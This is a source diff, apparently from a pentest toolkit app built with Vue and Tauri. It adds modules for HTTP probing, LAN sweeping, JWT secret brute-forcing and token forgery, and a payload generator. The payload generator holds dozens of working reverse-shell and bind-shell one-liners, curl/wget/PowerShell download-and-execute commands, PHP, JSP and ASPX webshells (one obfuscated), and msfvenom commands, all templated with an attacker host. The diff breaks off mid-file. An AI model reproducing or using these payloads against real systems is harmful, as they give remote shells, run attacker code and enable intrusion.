+        <div v-if="!identified.length" class="no-match">⨯ no signatures match</div>
+        <div v-else>
+          <div v-for="s in identified" :key="s.name" class="match">
+            <span class="m-name">{{ s.name }}</span>
+            <code class="m-pat">{{ s.pattern }}</code>
+          </div>
+        </div>
+      </div>
+    </section>
+
+    <section class="pane">
+      <div class="pane-head">HASH CALCULATOR</div>
+      <label class="ta">
+        <span class="lbl">input</span>
+        <textarea class="term-input" v-model="calcText" rows="2" spellcheck="false" @input="compute" placeholder="type to auto-hash..." />
+      </label>
+      <div v-if="Object.keys(hashes).length" class="hash-list">
+        <div v-for="(v, k) in hashes" :key="k" class="h-row">
+          <span class="h-k">{{ k }}</span>
+          <code class="h-v">{{ v }}</code>
+          <button class="btn-ghost tiny" @click="copy(v)">copy</button>
+        </div>
+      </div>
+    </section>
+  </div>
+</template>
+
+<style scoped>
+.pane { background: var(--bg-panel); border: 1px solid var(--border); padding: 8px; display: flex; flex-direction: column; gap: 6px; }
+.pane-head { font-size: 10px; color: var(--alert); font-weight: 700; text-transform: uppercase; letter-spacing: 0.2em; border-bottom: 1px solid var(--border); padding-bottom: 3px; }
+.matches { display: flex; flex-direction: column; gap: 3px; }
+.no-match { color: var(--fg-ghost); font-size: 11px; font-style: italic; padding: 4px; }
+.match { display: flex; gap: 8px; padding: 3px 6px; background: var(--bg); border-left: 2px solid var(--valid); align-items: center; }
+.m-name { color: var(--valid); font-weight: 700; font-size: 11px; min-width: 160px; }
+.m-pat { color: var(--fg-dim); font-size: 9px; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; flex: 1; min-width: 0; background: transparent; border: none; padding: 0; }
+
+.hash-list { display: flex; flex-direction: column; gap: 3px; }
+.h-row { display: flex; gap: 6px; align-items: center; font-size: 10px; padding: 2px 0; }
+.h-k { color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; min-width: 70px; font-size: 9px; flex-shrink: 0; }
+.h-v { color: var(--valid); word-break: break-all; flex: 1; background: var(--bg); border: 1px solid var(--border); padding: 2px 5px; font-size: 10px; min-width: 0; }
+.btn-ghost.tiny { padding: 1px 6px; font-size: 9px; flex-shrink: 0; }
+</style>
diff --git a/src/components/modules/HttpProbe.vue b/src/components/modules/HttpProbe.vue
new file mode 100644
index 0000000..2ecf77e
--- /dev/null
+++ b/src/components/modules/HttpProbe.vue
@@ -0,0 +1,159 @@
+<script setup lang="ts">
+import { onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+const targets = ref("example.com\nscanme.nmap.org");
+const ports = ref("80,443,8080,8443");
+const concurrency = ref(50);
+const timeoutMs = ref(5000);
+const follow = ref(true);
+const running = ref(false);
+const progress = ref({ done: 0, total: 0 });
+
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+function statusColor(s: number): "valid" | "ok" | "warn" | "err" {
+  if (s >= 200 && s < 300) return "valid";
+  if (s >= 300 && s < 400) return "ok";
+  if (s >= 400 && s < 500) return "warn";
+  return "err";
+}
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  log.clear();
+  progress.value = { done: 0, total: 0 };
+
+  const tgts = targets.value.split(/[\s,\n]+/).map((s) => s.trim()).filter(Boolean);
+  const pts = ports.value.split(/[\s,]+/).map((s) => parseInt(s, 10)).filter((n) => !isNaN(n));
+
+  log.info(`targets: ${tgts.length} | ports: ${pts.join(",")} | conc: ${concurrency.value}`);
+
+  unlistens.push(
+    await listen<{ done: number; total: number }>("httpx:progress", (e) => {
+      progress.value = e.payload;
+    })
+  );
+  unlistens.push(
+    await listen<{
+      url: string;
+      status: number;
+      title: string | null;
+      server: string | null;
+      tech: string[];
+    }>("httpx:hit", (e) => {
+      const p = e.payload;
+      const lvl = statusColor(p.status);
+      const parts = [
+        `${p.status}`.padEnd(4),
+        p.url.padEnd(40),
+        p.title ? `"${p.title.slice(0, 40)}"` : "",
+        p.server ? `[${p.server}]` : "",
+        p.tech.length ? `{${p.tech.join(",")}}` : "",
+      ].filter(Boolean).join(" ");
+      (log as any)[lvl](parts);
+    })
+  );
+
+  try {
+    const res: unknown[] = await invoke("http_probe", {
+      req: {
+        targets: tgts,
+        ports: pts,
+        concurrency: concurrency.value,
+        timeout_ms: timeoutMs.value,
+        follow_redirects: follow.value,
+      },
+    });
+    log.ok(`probe complete: ${res.length} alive`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() {
+  while (unlistens.length) {
+    const u = unlistens.pop();
+    if (u) u();
+  }
+}
+
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <label class="ta">
+        <span class="lbl">targets</span>
+        <textarea v-model="targets" placeholder="one host per line" spellcheck="false" rows="3" />
+      </label>
+      <div class="row">
+        <label class="mini wide">
+          <span>ports</span>
+          <input v-model="ports" placeholder="80,443,8080,8443" />
+        </label>
+      </div>
+      <div class="row">
+        <label class="mini">
+          <span>conc</span>
+          <input v-model.number="concurrency" type="number" min="1" max="500" />
+        </label>
+        <label class="mini">
+          <span>t/out</span>
+          <input v-model.number="timeoutMs" type="number" min="500" max="30000" />
+        </label>
+        <label class="toggle">
+          <input type="checkbox" v-model="follow" />
+          <span>follow</span>
+        </label>
+      </div>
+      <div class="row">
+        <button class="exec" :disabled="running" @click="run">
+          {{ running ? "[ probing... ]" : "> execute" }}
+        </button>
+      </div>
+      <div v-if="progress.total" class="bar">
+        <div class="bar-fill" :style="{ width: (progress.done / progress.total) * 100 + '%' }" />
+        <span class="bar-text">{{ progress.done }} / {{ progress.total }}</span>
+      </div>
+    </div>
+    <Terminal :lines="log.lines.value" title="http-probe // output" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.module { display: flex; flex-direction: column; gap: 10px; height: 100%; min-height: 0; }
+.form { display: flex; flex-direction: column; gap: 6px; }
+.row { display: flex; gap: 6px; }
+.ta { display: flex; flex-direction: column; }
+.lbl { color: var(--fg-dim); font-size: 10px; text-transform: uppercase; letter-spacing: 0.1em; padding: 2px 0; }
+textarea { background: var(--bg-panel); border: 1px solid var(--border); color: var(--fg); padding: 6px 8px; resize: vertical; font-family: inherit; font-size: 12px; }
+textarea:focus { border-color: var(--accent); }
+
+.mini { display: flex; align-items: center; gap: 4px; border: 1px solid var(--border); padding: 4px 8px; background: var(--bg-panel); }
+.mini.wide { flex: 1; }
+.mini span { color: var(--fg-dim); font-size: 10px; text-transform: uppercase; letter-spacing: 0.1em; }
+.mini input { flex: 1; width: 60px; color: var(--fg); }
+.mini.wide input { text-align: left; }
+
+.toggle { display: flex; align-items: center; gap: 6px; border: 1px solid var(--border); padding: 4px 10px; background: var(--bg-panel); color: var(--fg-dim); font-size: 11px; text-transform: uppercase; letter-spacing: 0.1em; cursor: pointer; }
+.toggle input { accent-color: var(--accent); }
+.toggle:has(input:checked) { color: var(--accent); border-color: var(--accent); }
+
+.exec { flex: 1; border: 1px solid var(--accent); color: var(--accent); padding: 6px 12px; font-weight: 500; transition: all 0.15s; }
+.exec:hover:not(:disabled) { background: var(--alert); color: #fff; border-color: var(--alert); box-shadow: 0 0 16px rgba(255, 47, 74, 0.35); }
+.exec:disabled { color: var(--fg-dim); border-color: var(--border-hot); cursor: wait; }
+
+.bar { position: relative; height: 14px; background: var(--bg-panel); border: 1px solid var(--border); overflow: hidden; }
+.bar-fill { height: 100%; background: linear-gradient(90deg, var(--accent-dim), var(--accent)); transition: width 0.1s linear; }
+.bar-text { position: absolute; inset: 0; display: flex; align-items: center; justify-content: center; font-size: 10px; mix-blend-mode: difference; letter-spacing: 0.1em; }
+</style>
diff --git a/src/components/modules/Jwt.vue b/src/components/modules/Jwt.vue
new file mode 100644
index 0000000..705d769
--- /dev/null
+++ b/src/components/modules/Jwt.vue
@@ -0,0 +1,149 @@
+<script setup lang="ts">
+import { onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+const token = ref("");
+const wordlist = ref("");
+const running = ref(false);
+const result = ref<any>(null);
+const progress = ref({ done: 0, total: 0 });
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+async function copy(text: string) {
+  try { await navigator.clipboard.writeText(text); log.ok("copied to clipboard"); }
+  catch { log.err("clipboard failed"); }
+}
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  result.value = null;
+  log.clear();
+
+  const words = wordlist.value.split(/[,\n\s]+/).map(s => s.trim()).filter(Boolean);
+
+  unlistens.push(await listen<string>("jwt:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<{ done: number; total: number }>("jwt:progress", (e) => { progress.value = e.payload; }));
+
+  try {
+    const res: any = await invoke("jwt_analyze", {
+      req: { token: token.value, wordlist: words.length ? words : null },
+    });
+    result.value = res;
+    log.info(`alg: ${res.alg}`);
+    for (const i of res.issues) {
+      const m = `[${i.severity}] ${i.title} :: ${i.detail}`;
+      if (i.severity === "CRITICAL" || i.severity === "HIGH") log.hit(m);
+      else if (i.severity === "MEDIUM") log.warn(m);
+      else log.dim(m);
+    }
+    for (const f of res.forgeries) {
+      log.ok(`[FORGERY] ${f.attack} :: ${f.description}`);
+    }
+    log.ok(`analysis complete: ${res.issues.length} issue(s), ${res.forgeries.length} forgery candidate(s)`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally { running.value = false; cleanup(); }
+}
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <label class="ta">
+        <span class="lbl">jwt token</span>
+        <textarea class="term-input" v-model="token" placeholder="eyJhbGciOi..." spellcheck="false" rows="3" />
+      </label>
+      <label class="ta">
+        <span class="lbl">hmac wordlist (optional, newline/comma separated)</span>
+        <textarea class="term-input" v-model="wordlist" placeholder="secret&#10;password&#10;jwt_secret" spellcheck="false" rows="2" />
+      </label>
+      <div class="row">
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ attacking... ]" : "> analyze + attack" }}</button>
+      </div>
+      <div v-if="progress.total" class="bar">
+        <div class="bar-fill" :style="{ width: (progress.done / progress.total) * 100 + '%' }" />
+        <span class="bar-text">{{ progress.done }} / {{ progress.total }}</span>
+      </div>
+    </div>
+
+    <div v-if="result" class="result-grid">
+      <div class="result-block">
+        <div class="rb-head">header</div>
+        <pre>{{ JSON.stringify(result.header, null, 2) }}</pre>
+      </div>
+      <div class="result-block">
+        <div class="rb-head">payload</div>
+        <pre>{{ JSON.stringify(result.payload, null, 2) }}</pre>
+      </div>
+      <div class="result-block full">
+        <div class="rb-head">forgery candidates ({{ result.forgeries.length }})</div>
+        <div v-for="(f, i) in result.forgeries" :key="i" class="forgery">
+          <div class="forgery-head">
+            <span class="sev sev-high">{{ f.attack }}</span>
+            <span class="forgery-desc">{{ f.description }}</span>
+            <button class="btn-ghost" @click="copy(f.token)">copy</button>
+          </div>
+          <code class="forgery-token">{{ f.token }}</code>
+        </div>
+      </div>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="jwt // alg:none + HMAC brute + forgery" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.result-grid {
+  display: grid;
+  grid-template-columns: 1fr 1fr;
+  gap: 6px;
+}
+.result-block {
+  border: 1px solid var(--border);
+  background: var(--bg-panel);
+  overflow: hidden;
+}
+.result-block.full { grid-column: 1 / -1; }
+.rb-head {
+  padding: 4px 8px;
+  border-bottom: 1px solid var(--border);
+  background: var(--bg-elev);
+  font-size: 10px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+}
+pre {
+  padding: 8px;
+  font-size: 11px;
+  color: var(--fg);
+  max-height: 180px;
+  overflow: auto;
+  white-space: pre-wrap;
+  word-break: break-all;
+}
+.forgery { border-bottom: 1px solid var(--border); padding: 6px 8px; }
+.forgery:last-child { border: none; }
+.forgery-head { display: flex; gap: 8px; align-items: center; margin-bottom: 4px; }
+.forgery-desc { flex: 1; color: var(--fg-dim); font-size: 11px; }
+.forgery-token {
+  display: block;
+  font-size: 10px;
+  color: var(--info);
+  word-break: break-all;
+  padding: 4px;
+  background: var(--bg);
+  border: 1px solid var(--border);
+}
+
+@media (max-width: 640px) {
+  .result-grid { grid-template-columns: 1fr; }
+}
+</style>
diff --git a/src/components/modules/LanMap.vue b/src/components/modules/LanMap.vue
new file mode 100644
index 0000000..5b1cbe2
--- /dev/null
+++ b/src/components/modules/LanMap.vue
@@ -0,0 +1,218 @@
+<script setup lang="ts">
+import { onMounted, onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import Prompt from "../Prompt.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface Device {
+  ip: string;
+  hostname?: string;
+  open_ports: number[];
+  services: string[];
+  upnp: string[];
+  guess?: string;
+}
+
+interface LocalInfo {
+  local_ip: string;
+  subnet: string;
+  platform: string;
+  android: boolean;
+}
+
+const info = ref<LocalInfo | null>(null);
+const subnet = ref("");
+const probeMdns = ref(true);
+const probeSsdp = ref(true);
+const concurrency = ref(80);
+const timeoutMs = ref(800);
+const running = ref(false);
+const progress = ref({ done: 0, total: 0 });
+const devices = ref<Device[]>([]);
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+async function loadInfo() {
+  try {
+    info.value = await invoke<LocalInfo>("lan_local_info");
+    if (!subnet.value && info.value.subnet) subnet.value = info.value.subnet;
+  } catch (e: any) { log.err(String(e)); }
+}
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  devices.value = [];
+  progress.value = { done: 0, total: 0 };
+  log.clear();
+
+  unlistens.push(await listen<string>("lanmap:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<{ done: number; total: number }>("lanmap:progress", (e) => { progress.value = e.payload; }));
+  unlistens.push(await listen<Device>("lanmap:device", (e) => {
+    const p = e.payload;
+    log.valid(`${p.ip.padEnd(16)} ports: ${p.open_ports.join(",")} ${p.guess ? `→ ${p.guess}` : ""}`);
+  }));
+
+  try {
+    const report: any = await invoke("lan_scan", {
+      req: {
+        subnet_cidr: subnet.value || null,
+        ports: null,
+        probe_mdns: probeMdns.value,
+        probe_ssdp: probeSsdp.value,
+        concurrency: concurrency.value,
+        timeout_ms: timeoutMs.value,
+      },
+    });
+    devices.value = report.devices;
+    log.ok(`scan done: ${report.devices.length} devices on ${report.subnet}`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+
+onMounted(loadInfo);
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <div class="info-strip">
+        <div class="info-cell">
+          <span class="info-key">my ip</span>
+          <span class="info-val">{{ info?.local_ip ?? "—" }}</span>
+        </div>
+        <div class="info-cell">
+          <span class="info-key">subnet</span>
+          <span class="info-val">{{ info?.subnet ?? "—" }}</span>
+        </div>
+        <div class="info-cell">
+          <span class="info-key">platform</span>
+          <span class="info-val">{{ info?.platform ?? "—" }}</span>
+        </div>
+      </div>
+
+      <Prompt label="subnet" v-model="subnet" placeholder="192.168.1.0/24 (auto)" />
+
+      <div class="row">
+        <label class="toggle"><input type="checkbox" v-model="probeMdns" /><span>mdns</span></label>
+        <label class="toggle"><input type="checkbox" v-model="probeSsdp" /><span>ssdp/upnp</span></label>
+        <label class="mini"><span>conc</span><input v-model.number="concurrency" type="number" min="1" max="500" /></label>
+        <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="100" max="5000" /></label>
+      </div>
+      <div class="row">
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ scanning... ]" : "> sweep LAN" }}</button>
+      </div>
+
+      <div v-if="info?.android" class="warn-strip">
+        <b>android note:</b> mDNS/SSDP multicast may be dropped without MulticastLock from a native plugin. TCP sweep is unaffected.
+      </div>
+
+      <div v-if="progress.total" class="bar">
+        <div class="bar-fill" :style="{ width: (progress.done / progress.total) * 100 + '%' }" />
+        <span class="bar-text">{{ progress.done }} / {{ progress.total }}</span>
+      </div>
+    </div>
+
+    <div v-if="devices.length" class="dev-grid">
+      <div v-for="d in devices" :key="d.ip" class="dev">
+        <div class="dev-head">
+          <span class="dev-ip">{{ d.ip }}</span>
+          <span v-if="d.guess" class="dev-guess">{{ d.guess }}</span>
+        </div>
+        <div v-if="d.open_ports.length" class="dev-row">
+          <span class="dev-key">ports</span>
+          <span class="port-chips">
+            <span v-for="p in d.open_ports" :key="p" class="port-chip">{{ p }}</span>
+          </span>
+        </div>
+        <div v-if="d.services.length" class="dev-row">
+          <span class="dev-key">mdns</span>
+          <span class="dev-list">{{ d.services.slice(0, 3).join(", ") }}<span v-if="d.services.length > 3"> +{{ d.services.length - 3 }}</span></span>
+        </div>
+        <div v-if="d.upnp.length" class="dev-row">
+          <span class="dev-key">upnp</span>
+          <span class="dev-list">{{ d.upnp[0].slice(0, 80) }}</span>
+        </div>
+      </div>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="lan-map // discovery" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.info-strip {
+  display: flex;
+  gap: 6px;
+  flex-wrap: wrap;
+  padding: 6px 8px;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  font-size: 11px;
+}
+.info-cell { display: flex; gap: 6px; align-items: center; min-width: 0; }
+.info-key { color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; font-size: 10px; }
+.info-val { color: var(--info); }
+
+.warn-strip {
+  font-size: 11px;
+  padding: 6px 8px;
+  color: var(--warn);
+  border: 1px solid rgba(212, 165, 55, 0.3);
+  background: rgba(212, 165, 55, 0.05);
+}
+
+.dev-grid {
+  display: grid;
+  grid-template-columns: repeat(auto-fill, minmax(220px, 1fr));
+  gap: 6px;
+  max-height: 260px;
+  overflow-y: auto;
+}
+.dev {
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  padding: 6px 8px;
+  display: flex;
+  flex-direction: column;
+  gap: 4px;
+  min-width: 0;
+}
+.dev:hover { border-color: var(--alert); }
+.dev-head { display: flex; justify-content: space-between; align-items: baseline; gap: 6px; }
+.dev-ip { color: var(--fg); font-weight: 700; font-size: 12px; }
+.dev-guess { color: var(--info); font-size: 10px; text-transform: uppercase; letter-spacing: 0.05em; }
+.dev-row { display: flex; gap: 6px; align-items: center; min-width: 0; }
+.dev-key {
+  color: var(--fg-dim);
+  font-size: 9px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  min-width: 32px;
+}
+.dev-list {
+  color: var(--fg-dim);
+  font-size: 10px;
+  overflow: hidden;
+  text-overflow: ellipsis;
+  white-space: nowrap;
+  flex: 1;
+  min-width: 0;
+}
+.port-chips { display: flex; gap: 3px; flex-wrap: wrap; }
+.port-chip {
+  font-size: 9px;
+  color: var(--alert);
+  border: 1px solid var(--border-hot);
+  padding: 0 4px;
+}
+</style>
diff --git a/src/components/modules/PayloadGen.vue b/src/components/modules/PayloadGen.vue
new file mode 100644
index 0000000..88af20f
--- /dev/null
+++ b/src/components/modules/PayloadGen.vue
@@ -0,0 +1,311 @@
+<script setup lang="ts">
+import { computed, ref } from "vue";
+
+interface PayloadTemplate {
+  category: "reverse-shell" | "bind-shell" | "webshell" | "msfvenom" | "file-upload" | "oneliner";
+  name: string;
+  lang: string;
+  template: string;
+  note?: string;
+}
+
+const lhost = ref("10.10.14.1");
+const lport = ref("4444");
+const cmd = ref("id");
+const query = ref("");
+const activeCategory = ref<PayloadTemplate["category"] | "all">("all");
+
+const templates: PayloadTemplate[] = [
+  // ------------------- REVERSE SHELLS -------------------
+  { category: "reverse-shell", name: "bash /dev/tcp", lang: "bash", template: `bash -c 'bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1'` },
+  { category: "reverse-shell", name: "bash 196", lang: "bash", template: `0<&196;exec 196<>/dev/tcp/{LHOST}/{LPORT}; sh <&196 >&196 2>&196` },
+  { category: "reverse-shell", name: "sh", lang: "sh", template: `/bin/sh -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1` },
+  { category: "reverse-shell", name: "nc traditional", lang: "nc", template: `nc -e /bin/sh {LHOST} {LPORT}` },
+  { category: "reverse-shell", name: "nc mkfifo", lang: "nc", template: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f` },
+  { category: "reverse-shell", name: "ncat with ssl", lang: "ncat", template: `ncat --ssl {LHOST} {LPORT} -e /bin/bash` },
+  { category: "reverse-shell", name: "python3 short", lang: "python", template: `python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("{LHOST}",{LPORT}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'` },
+  { category: "reverse-shell", name: "python classic", lang: "python", template: `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'` },
+  { category: "reverse-shell", name: "perl", lang: "perl", template: `perl -e 'use Socket;$i="{LHOST}";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'` },
+  { category: "reverse-shell", name: "ruby", lang: "ruby", template: `ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("{LHOST}",{LPORT}))'` },
+  { category: "reverse-shell", name: "php exec", lang: "php", template: `php -r '$sock=fsockopen("{LHOST}",{LPORT});exec("/bin/sh -i <&3 >&3 2>&3");'` },
+  { category: "reverse-shell", name: "nodejs", lang: "node", template: `require('child_process').exec('bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1');` },
+  { category: "reverse-shell", name: "powershell TCP", lang: "powershell", template: `$client = New-Object System.Net.Sockets.TCPClient("{LHOST}",{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()` },
+  { category: "reverse-shell", name: "powershell -c (one-liner)", lang: "powershell", template: `powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("{LHOST}",{LPORT});$s=$c.GetStream();...` },
+  { category: "reverse-shell", name: "awk", lang: "awk", template: `awk 'BEGIN {s = "/inet/tcp/0/{LHOST}/{LPORT}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null` },
+  { category: "reverse-shell", name: "golang", lang: "go", template: `echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","{LHOST}:{LPORT}");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/r.go && go run /tmp/r.go` },
+  { category: "reverse-shell", name: "socat tty", lang: "socat", template: `socat TCP:{LHOST}:{LPORT} EXEC:'bash -li',pty,stderr,setsid,sigint,sane` },
+  { category: "reverse-shell", name: "lua", lang: "lua", template: `lua -e "require('socket');require('os');t=socket.tcp();t:connect('{LHOST}','{LPORT}');while true do local s,status,partial=t:receive();f=assert(io.popen(s,'r'));o=f:read('*a');t:send(o);end"` },
+
+  // ------------------- BIND SHELLS -------------------
+  { category: "bind-shell", name: "nc bind", lang: "nc", template: `nc -lvnp {LPORT} -e /bin/bash` },
+  { category: "bind-shell", name: "python bind", lang: "python", template: `python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1);s.bind(("0.0.0.0",{LPORT}));s.listen(1);c,a=s.accept();subprocess.call(["/bin/sh","-i"],stdin=c.fileno(),stdout=c.fileno(),stderr=c.fileno())'` },
+  { category: "bind-shell", name: "socat bind", lang: "socat", template: `socat TCP-LISTEN:{LPORT},reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane` },
+
+  // ------------------- LISTENERS -------------------
+  { category: "oneliner", name: "netcat listener", lang: "nc", template: `nc -lvnp {LPORT}`, note: "run on attacker to catch reverse shell" },
+  { category: "oneliner", name: "socat listener (tty)", lang: "socat", template: `socat file:\`tty\`,raw,echo=0 TCP-L:{LPORT}`, note: "fully interactive tty on attacker" },
+  { category: "oneliner", name: "rlwrap nc", lang: "nc", template: `rlwrap nc -lvnp {LPORT}`, note: "with history + arrow keys" },
+  { category: "oneliner", name: "python http server", lang: "python", template: `python3 -m http.server {LPORT}`, note: "host payloads for curl/wget target" },
+  { category: "oneliner", name: "smb server (impacket)", lang: "python", template: `impacket-smbserver share . -smb2support -username user -password pass`, note: "SMB share for windows target" },
+
+  // ------------------- TARGET COMMANDS -------------------
+  { category: "oneliner", name: "curl download + exec", lang: "bash", template: `curl http://{LHOST}:{LPORT}/sh.sh | bash` },
+  { category: "oneliner", name: "wget download + exec", lang: "bash", template: `wget -qO- http://{LHOST}:{LPORT}/sh.sh | sh` },
+  { category: "oneliner", name: "powershell download + exec", lang: "powershell", template: `powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}:{LPORT}/p.ps1')"` },
+  { category: "oneliner", name: "certutil download (win)", lang: "windows", template: `certutil.exe -urlcache -split -f "http://{LHOST}:{LPORT}/nc.exe" nc.exe` },
+  { category: "oneliner", name: "bitsadmin download (win)", lang: "windows", template: `bitsadmin /transfer n http://{LHOST}:{LPORT}/nc.exe %APPDATA%\\nc.exe` },
+
+  // ------------------- PTY UPGRADE -------------------
+  { category: "oneliner", name: "python pty spawn", lang: "python", template: `python -c 'import pty;pty.spawn("/bin/bash")'`, note: "after catching shell: upgrade to pty" },
+  { category: "oneliner", name: "script pty", lang: "bash", template: `script /dev/null -c bash`, note: "alternative pty upgrade" },
+  { category: "oneliner", name: "stty raw", lang: "bash", template: `stty raw -echo; fg`, note: "on attacker after Ctrl+Z to get raw tty" },
+
+  // ------------------- WEBSHELLS -------------------
+  { category: "webshell", name: "PHP one-liner", lang: "php", template: `<?php system($_GET['c']); ?>`, note: "simplest php webshell — ?c=id" },
+  { category: "webshell", name: "PHP obfuscated", lang: "php", template: `<?php $f="s"."y"."s"."t"."e"."m";$f($_REQUEST["c"]); ?>` },
+  { category: "webshell", name: "PHP file upload", lang: "php", template: `<?php if(isset($_FILES['f'])){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?><form method=post enctype=multipart/form-data><input name=f type=file><input type=submit></form>` },
+  { category: "webshell", name: "JSP shell", lang: "jsp", template: `<% Runtime.getRuntime().exec(request.getParameter("c")); %>` },
+  { category: "webshell", name: "ASPX shell", lang: "aspx", template: `<%@ Page Language="C#" %><%@ Import Namespace="System.Diagnostics" %><% Process.Start("cmd.exe","/c "+Request["c"]); %>` },
+  { category: "webshell", name: "Python flask shell", lang: "python", template: `from flask import Flask,request\nimport os\napp=Flask(__name__)\n@app.route('/')\ndef r(): return os.popen(request.args.get('c','id')).read()\napp.run(host='0.0.0.0',port={LPORT})` },
+  { category: "webshell", name: "Node.js Express shell", lang: "node", template: `require('express')().get('/',(q,r)=>require('child_process').exec(q.query.c||'id',(e,o)=>r.send(o))).listen({LPORT})` },
+
+  // ------------------- MSFVENOM -------------------
+  { category: "msfvenom", name: "linux x64 meterpreter", lang: "msfvenom", template: `msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf -o shell.elf` },
+  { category: "msfvenom", name: "windows x64 meterpreter", lang: "msfvenom", template: `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o shell.exe` },
+  { category: "msfvenom", name: "php meterpreter", lang: "msfvenom", template: `msfvenom -p php/meterpreter_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f raw > shell.php` },
+  { category: "msfvenom", name: "aspx meterpreter", lang: "msfvenom", template: `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f aspx -o shell.aspx` },
+  { category: "msfvenom", name: "war meterpreter", lang: "msfvenom", template: `msfvenom -p java/jsp_shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f war -o shell.war` },
+  { category: "msfvenom", name: "android apk", lang: "msfvenom", template: `msfvenom -p android/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} R > shell.apk` },
+  { category: "msfvenom", name: "python reverse", lang: "msfvenom", template: `msfvenom -p python/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f raw -o shell.py` },
+  { category: "msfvenom", name: "shellcode C buffer", lang: "msfvenom", template: `msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f c -b "\\x00\\x0a"` },
+
+  // ------------------- FILE UPLOAD BYPASS -------------------
